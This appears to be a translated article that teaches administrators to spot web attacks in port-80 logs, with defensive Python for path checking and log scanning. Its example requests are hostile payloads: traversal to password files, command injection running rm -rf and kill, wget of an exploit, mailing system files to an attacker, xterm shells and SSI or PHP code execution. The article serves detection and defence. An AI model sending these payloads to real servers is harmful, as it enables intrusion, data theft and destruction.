80 port web service attack marks

xiaoxiao2021-03-06  17


Source: China Staff League

[Summary]

The default service port of a web site is port 80. Security issues involving it are published continually, and some of them even let an attacker gain system administrator privileges on the site. Below is a study of the traces left by some attacks on port 80, showing how to find problems by reading the logs.

[Detailed Description]

The following sections describe common attacks against web servers and the applications running on them, and the traces these attacks leave. The traces shown are only representative; the list does not cover every form of attack. Each attack is described in detail, along with how it exploits the vulnerability.

(1) ".", ".." and "..." requests

These attack marks are very common for web applications and web servers. They are used by an attacker or a worm program to change the path on the web server in order to reach an area that is not normally accessible. Most CGI program vulnerabilities involve these ".." requests.

EXAMPLE:

http://host/cgi-bin/lame.cgi?file=../../../../etc/motd

This shows the attacker requesting the motd file. If an attacker can break out of the web server's root directory, more information and privileges can be obtained.

(2) "%20" request

%20 is the hexadecimal value for a space. By itself this does not mean anything is wrong, but you will find it when you browse the log, and this character may be valid for some applications running on the web server, so look at the surrounding request carefully. On the other hand, this request can sometimes help an attacker run commands.

EXAMPLE:

http://host/cgi-bin/lame.cgi?page=ls%20-al|

This shows an attacker executing a UNIX command that lists the entire directory, giving the attacker access to important files on your system and helping him obtain further privileges.

(3) "%00" request

%00 is the hexadecimal representation of a null byte. It can be used to fool a web application into serving a different type of file.

EXAMPLES:

http://host/cgi-bin/lame.cgi?page=index.html

This may be a valid request on this machine. If the attacker watches how the request behaves, he may find a problem in this CGI program.

http://host/cgi-bin/lame.cgi?page=../../../../etc/motd

Perhaps this CGI program does not accept this request because it checks the suffix of the requested file, such as .html, .shtml or another type. Most programs will tell you that the requested file type is invalid. This tells the attacker that the request must end in a certain suffix, and the error message may also reveal the system path and file names, leaking more sensitive information about your system.

http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html

Note this request: it tricks the CGI program into thinking the file is of an acceptable type. Because some applications do this check carelessly, this is a method commonly used by attackers.
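The suffix check and its %00 bypass from section (3), as an added illustration that is not part of the original article: the weak check passes the null-byte request, and a hardened resolver rejects it. WEB_ROOT, the allowed suffixes and the function names are assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/pages"  # assumed document root of the CGI (hypothetical)
ALLOWED_SUFFIXES = (".html", ".shtml")


def decode_param(raw: str) -> str:
    """Decode the query value the way the CGI would; %00 becomes a real NUL byte."""
    return unquote(raw)


def naive_suffix_check(page: str) -> bool:
    """The weak check from section (3): it only looks at how the string ends,
    so '../../../../etc/motd\\x00html' passes because it ends in 'html'."""
    return page.endswith("html")


def path_seen_by_c_runtime(page: str) -> str:
    """A C open() treats the first NUL byte as the end of the string, so a program
    that passed the naive check opens only what comes before the NUL."""
    return page.split("\x00", 1)[0]


def safe_resolve(page: str) -> Optional[str]:
    """Hardened resolver: reject NUL bytes, require a real suffix, then normalise
    the path and refuse anything that escapes WEB_ROOT. Returns None on rejection."""
    if "\x00" in page or not page.endswith(ALLOWED_SUFFIXES):
        return None
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, page.lstrip("/")))
    if posixpath.commonpath([WEB_ROOT, resolved]) != WEB_ROOT:
        return None  # '..' components walked out of the document root
    return resolved
```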

(4) "|" request

This is the pipe character; on UNIX systems it lets several system commands run together in one request.

EXAMPLE:

# cat access_log | grep -i ".." (this command displays the ".." requests in the log and is often used to discover attackers and worm attacks)

You will often see web applications that use this character, which also leads to false alarms in the IDS log.

Check your own programs carefully; this is good practice and reduces false alerts in the intrusion detection system.

Some listings are given below:

http://host/cgi-bin/lame.cgi?page=../../../../bin/ls

This request executes the command; below are some variations.

http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc|

This request lists all files in the /etc directory on a UNIX system.

http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i%20"lame"

This request executes the cat command and then the grep command, searching the log for "lame".

(5) ";" request

On UNIX systems, this character allows multiple commands to be executed on one line.

EXAMPLE:

# id; uname -a

(after the id command runs, the uname command runs)

Some web programs use this character, which may cause alerts in your IDS log. Check your web programs carefully so that such IDS alerts do not become noise.

(6) "<" and ">" requests

Check your logs for these two characters for many reasons, the main one being that they indicate appending data to a file.

EXAMPLE 1:

# echo "Your Hax0red H0 H0" >> /etc/motd (writes the text into the motd file)

With this kind of request an attacker can easily tamper with your web pages. For example, the well-known RDS exploit is often used by attackers to change a site's main page.

EXAMPLE 2:

http://host/something.php=<b>hi%20MOM%20IM%20Bold!</b>

Notice the HTML tags, which also use the "<" and ">" characters. This attack does not give the attacker access to the system; it makes the injected text look like legitimate information on the web site. (When a visitor follows a link set up by the attacker, the request may be converted into hex-encoded form so that the traces of the attack are not so obvious.)

(7) "!" request

This character is commonly used in attacks against SSI (Server Side Includes), for example when the attacker tricks a user into clicking a link the attacker has prepared.

EXAMPLE:

http://host1/something.php=<!--#include%20virtual="http://host2/[file]"-->

This shows what an attacker may do: make a file on the host2 site appear to come from host1 (of course, the visitor must follow the link the attacker set up; the request may be hex-encoded as camouflage and is then not easy to spot).

At the same time, this method can also execute commands with the permissions of the web site.

EXAMPLE:

http://host/something.php=<!--#exec%20cmd="id"-->

This is executed on the remote system and displays the web site's user ID, usually "nobody" or "www".

This form also allows hidden files to be included.

EXAMPLE:

http://host/something.php=<!--#include%20virtual=".htpasswd"-->

The hidden file .htpasswd would not normally be displayed: Apache's default rules reject requests for .ht* files, but the SSI directive bypasses this limit and leads to a security issue.

(8) "<?" request

This attack inserts PHP code into a remote web application, which may allow command execution, depending on the server settings and other factors such as whether PHP is running in safe mode.

EXAMPLE:

http://host/something.php=<?%20passthru("id")%20?>

In some simple PHP applications, this may execute local commands on the remote system as the web site user.

(9) "`" request

This character is often used in Perl to execute commands. It is rarely used in web applications, so if you see it in your log, be very careful.

EXAMPLE:

http://host/something.cgi=`id`

A badly written Perl CGI program would cause the id command to run.

[Further]

The following section discusses commands an attacker may execute and files he may request. If one of your programs lets such a command through, you should find it here. This part only gives you an idea of what happens when an attacker tries to attack your system and what traces are left; it does not list all the commands and requests an attacker may use.

"/bin/ls"

This command is requested by its full path, and many web applications have this vulnerability. If you see this request in many places in the log, it is very likely a remote command execution vulnerability, but not necessarily a problem; it may also be a false alert. Once again, writing good web applications (CGI, ASP, PHP, etc.) is the basis of security.

EXAMPLE:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|

http://host/cgi-bin/bad.cgi?doh=ls%20-al;

"cmd.exe"

This is the Windows shell. An attacker who can reach and run it can do anything on the Windows machine that the server's account allows, and many worms spread to remote machines through port 80 this way.

http://host/scripts/something.asp=../../winnt/system32/cmd.exe?dir%20e:

"/bin/id"

This is a binary file, like /bin/ls. If you see this request in many places in the log, it is very likely a remote command execution vulnerability, but not necessarily a problem; it may also be a false alert.

It tells the attacker which user, and which group, the web server runs as.

EXAMPLE:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|

http://host/cgi-bin/bad.cgi?doh=id;

"/bin/rm"

This command deletes files and is very dangerous if misused.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|

http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;

"wget" and "tftp" commands

These commands are often used by an attacker to download files that may help him obtain further privileges. wget is a UNIX command that may be used to download a backdoor program; tftp is a command on both UNIX and NT for downloading files. Some IIS worms copy themselves with tftp to spread directly to other hosts.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget%20http://host2/phantasmp.c|

http://host/cgi-bin/bad.cgi?doh=wget%20http://www.hwa-security.net/phantasmp.c;

"cat" command

This command displays file contents and is often used to read important information such as configuration files, password files, credit card files, and any other file you can think of.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat%20/etc/motd|

http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;

"echo" command

This command is often used to write data into a file, such as "index.html".

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt|

http://host/cgi-bin/bad.cgi?doh=echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt;

"ps" command

Lists the currently running processes, telling the attacker which software the remote host is running, so that he can look for security problems in it and gain further privileges.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-aux

http://host/cgi-bin/bad.cgi?doh=ps%20-aux;

"kill" and "killall" commands

On UNIX systems these commands kill processes. An attacker can use them to stop system services and programs, and to wipe away traces of the attack. Some exploits also spawn many child processes.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200|

http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;

"uname" command

This command tells the attacker the name of the host; sometimes it also reveals which ISP the host is on, or whether the attacker has already visited it that day. Usually the request is uname -a, and it will be recorded in the log file.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname%20-a|

http://host/cgi-bin/bad.cgi?doh=uname%20-a;

Compilers and interpreters: "cc", "gcc", "perl", "python", etc.

The attacker downloads an exploit with wget or tftp, then uses a compiler such as cc or gcc to build the executable and gain further privileges.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc%20phantasmp.c|

http://host/cgi-bin/bad.cgi?doh=gcc%20phantasmp.c;./a.out%20-p%2031337;

If you find "perl" or "python" in the log, the attacker may have downloaded a Perl or Python script and be trying to gain privileges locally.

"mail" command

An attacker usually uses this command to send important system files to his own mailbox; it can also be used for a mail bomb attack.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail%20attacker@fuckcnhonker.org%20<<%20/etc/motd|

http://host/cgi-bin/bad.cgi?doh=mail%20steele@jersey.whitehouse.gov%20<<%20/tmp/wu-2.6.1.c;

"xterm" and other X applications

xterm is often used to get a shell on the remote machine. If you find these in your log, analyze your system carefully; it may already have been compromised. Note that the string "%20-display%20" in the log is usually used to start xterm or another X application on the remote machine.

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../usr/X11R6/bin/xterm%20-display%20192.168.22.1|

http://host/cgi-bin/bad.cgi?doh=xeyes%20-display%20192.168.22.1;

"chown", "chmod", "chgrp", "chsh" and similar commands

These commands change file permissions and ownership on UNIX systems:

chown: sets the owner of a file
chmod: sets the permission bits of a file
chgrp: sets the group of a file
chsh: changes the user's login shell

EXAMPLES:

http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod%20777%20index.html|

http://host/cgi-bin/bad.cgi?doh=chmod%20777%20index.html;

http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown%20zeno%20/etc/master.passwd|

http://host/cgi-bin/bad.cgi?doh=chsh%20/bin/sh;

http://host/cgi-bin/bad.cgi?doh=../../../../bin/chgrp%20nobody%20/etc/shadow|

"/etc/passwd" file

This is the system's password file. It is generally shadowed, so it does not contain the encrypted passwords, but the attacker can still learn which users are valid, the absolute paths on the system, the site name and other information. Because it is usually shadowed, attackers instead try to view the /etc/shadow file.

"/etc/master.passwd"

This is the password file of BSD systems and contains the encrypted passwords. It is readable only by the root account, yet some unskilled attackers still attempt to read it. If the web site runs with root privileges, the attacker can read its contents and then crack the passwords, including the system administrator's.

"/etc/shadow"

Contains the encrypted system passwords; it is also readable only by root, much like /etc/master.passwd.

"/etc/motd"

This "Message of the Day" file is shown when a user logs in to a UNIX system. It provides important system information and administrator notices to users, and often includes the system version. Attackers typically view this file to learn what system is running; the next step is to search for exploits for that type of system to gain further privileges.

"/etc/hosts"

This file maps IP addresses to host names, so an attacker can learn more about the network settings of the system.

"/usr/local/apache/conf/httpd.conf"

This is the configuration file of the Apache web server; from it an attacker can learn whether CGI, SSI and similar features are enabled.

"/etc/inetd.conf"

This is the configuration file of the inetd service. From it an attacker can learn which services run on the remote machine and whether TCP Wrappers are used for access control. If wrappers are in use, the attacker will check the /etc/hosts.allow and /etc/hosts.deny files and may change some settings in them to gain privileges.

".htpasswd, .htaccess, and .htgroup"

These files are typically used to authenticate users. An attacker will view them to get user names and passwords. The passwords in .htpasswd are encrypted, but they can be recovered with simple cracking programs, giving the attacker access to the protected areas of the site (users often reuse the same password, so the attacker may also gain access to other accounts).

"access_log and error_log"

These are the Apache server's log files. Attackers often view them to see which requests have been recorded and which ones look unusual.

Typically an attacker will modify these log files, for example to remove his own address. If an attacker breaks into your system through port 80, your system has no backups, and no other recorder keeps a record of the system state, intrusion detection becomes very difficult.

"[Drive-Letter]:\winnt\repair\sam._ or [Drive-Letter]:\winnt\repair\sam"

This is the password file of Windows NT systems. If remote commands cannot be executed, the attacker will usually request these files and then crack the passwords with a tool such as L0phtCrack. If the attacker recovers the Administrator's password, the remote machine is under his control.

[Overflow Analysis]

This article will not say much about overflows; it only mentions the places and traces worth special attention. Buffer overflow attacks are often hard to discover because attackers hide them with encoding and other tricks.

Here is a simple example:

EXAMPLE:

http://host/cgi-bin/helloworld?type=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

This shows an attacker sending a long run of A characters to an application to test it for a buffer overflow. A successful overflow can give command execution on the remote host. If the program is setuid, the overflow can give access to the whole system as the program's owner; if not, the overflow only gives the permissions of the user the web site runs as.

These are not all the cases, but you should check your log files. If you suddenly find many such requests on a day when there are usually few, you are probably under an overflow attack, although it may also be a new network worm.

[Encoding Conversion]

For all the attack requests mentioned above, an attacker usually knows that IDS systems check these requests mechanically, so he will convert the request into hex-encoded form with an encoding tool, causing the IDS to ignore it. The well-known CGI vulnerability scanner whisker is a good example of this. If you find many hex-encoded and uncommon characters while viewing the log, someone may be trying to attack your system in this way.

A quick way to check is to copy the hex-encoded request from your log file into your browser, which translates it into the plain request and shows what was requested. If you don't dare take that risk, `man ascii` gives you the correct encoding table.
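As an added example that is not from the original article, here is a small log scanner that applies the indicators from the sections above to constructed access_log lines, decoding hex-encoded and double-encoded requests first as this section recommends. The sample lines, the indicator lists and the 64-character threshold for the overflow probe are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed access_log lines in Apache common log format (sample data, not from a real host).
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [06/Mar/2021:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.11 - - [06/Mar/2021:10:00:02 +0000] "GET /cgi-bin/lame.cgi?file=../../../../etc/motd HTTP/1.0" 200 88',
    '192.0.2.12 - - [06/Mar/2021:10:00:03 +0000] "GET /cgi-bin/lame.cgi?page=../../../../etc/motd%00html HTTP/1.0" 200 88',
    '192.0.2.13 - - [06/Mar/2021:10:00:04 +0000] "GET /cgi-bin/bad.cgi?doh=%252e%252e%252f%252e%252e%252fbin%252fls%2520-al%257c HTTP/1.0" 200 3000',
    '192.0.2.14 - - [06/Mar/2021:10:00:05 +0000] "GET /scripts/something.asp=../../winnt/system32/cmd.exe?dir%20e: HTTP/1.0" 404 0',
    '192.0.2.15 - - [06/Mar/2021:10:00:06 +0000] "GET /cgi-bin/helloworld?type=' + "A" * 80 + ' HTTP/1.0" 500 0',
])

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Indicators taken from the sections above: metacharacters, commands and sensitive files.
META = {"..": "traversal", "\x00": "null byte", "|": "pipe", ";": "semicolon", "<": "redirect/tag",
        ">": "redirect/tag", "!": "SSI", "`": "backtick", "<?": "php tag"}
COMMANDS = ("/bin/ls", "/bin/id", "cmd.exe", "/bin/rm", "wget", "tftp", "cat ", "echo ", "ps ",
            "kill", "uname", "gcc", "cc ", "perl", "python", "mail ", "xterm", "-display",
            "chmod", "chown", "chgrp", "chsh")
FILES = ("/etc/passwd", "/etc/shadow", "master.passwd", "/etc/motd", "/etc/hosts", "httpd.conf",
         "inetd.conf", ".htpasswd", ".htaccess", ".htgroup", "access_log", "error_log", "sam._")
LONG_RUN = re.compile(r"(.)\1{63,}")  # 64+ repeats of one character: the shape of an overflow probe

def fully_decode(uri: str, rounds: int = 3) -> str:
    """Undo hex (URL) encoding repeatedly, so double-encoded requests do not slip past the checks."""
    while rounds and unquote(uri) != uri:
        uri, rounds = unquote(uri), rounds - 1
    return uri

def classify(decoded: str) -> list:
    """Return the names of every indicator present in one decoded request URI."""
    low = decoded.lower()
    tags = [name for token, name in META.items() if token in low]
    tags += ["command:" + c.strip() for c in COMMANDS if c in low]
    tags += ["file:" + f for f in FILES if f in low]
    if LONG_RUN.search(low):
        tags.append("long repeated run (overflow probe)")
    return tags

def scan_log(text: str) -> list:
    """Parse each line, decode its URI and keep only the requests that carry indicators."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a common-log-format line
        ip, _when, _method, uri, status = m.groups()
        decoded = fully_decode(uri)
        tags = classify(decoded)
        if tags:
            hits.append({"ip": ip, "status": status, "uri": uri, "decoded": decoded, "tags": tags})
    return hits
```

Expect some false positives from short tokens such as "kill" or "!" in ordinary requests, exactly as the text warns for the IDS; the decoded field lets you judge each hit.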

Please credit the original address when reprinting: https://www.9cbs.com/read-41707.html
